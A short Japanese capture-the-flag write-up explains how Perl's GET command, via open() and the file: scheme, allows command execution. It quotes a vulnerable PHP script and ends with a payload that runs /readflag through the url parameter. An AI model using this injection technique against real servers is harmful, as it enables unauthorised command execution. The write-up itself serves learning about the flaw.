知識のポイント
PerlスクリプトGETopenコマンドの脆弱性
GETは、PerlのWWW用のLibのコマンドです。目的はhttp GET要求をシミュレートすることです。GET関数の最下層は、オープン処理を呼び出します。
オープンコマンドの実行が存在し、ファイル機能もサポートしています
新しく学んだ機能
コード監査
前のコードは、オレンジで暗号化されたmd5である私のipを返します。urlパラメータで入力した内容はGETコマンドで
実行され、コマンド実行の結果はfilenameパラメータの値にちなんで名付けられたファイルに保存されます。
<?php
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
$_SERVER['REMOTE_ADDR'] = $http_x_headers[0];
}
echo $_SERVER["REMOTE_ADDR"];
$sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
@mkdir($sandbox);
@chdir($sandbox);
$data = shell_exec("GET " . escapeshellarg($_GET["url"]));
$info = pathinfo($_GET["filename"]);
$dir = str_replace(".", "", basename($info["dirname"]));
@mkdir($dir);
@chdir($dir);
@file_put_contents(basename($info["basename"]), $data);
highlight_file(__FILE__);
ルートディレクトリを読み取って、abcという名前のファイルを作成してみてください。
フラグを読み取ってペイロードを作成するには、readflagを使用する必要があることがわかります。?url=file:bash -c /readflag|&filename=123
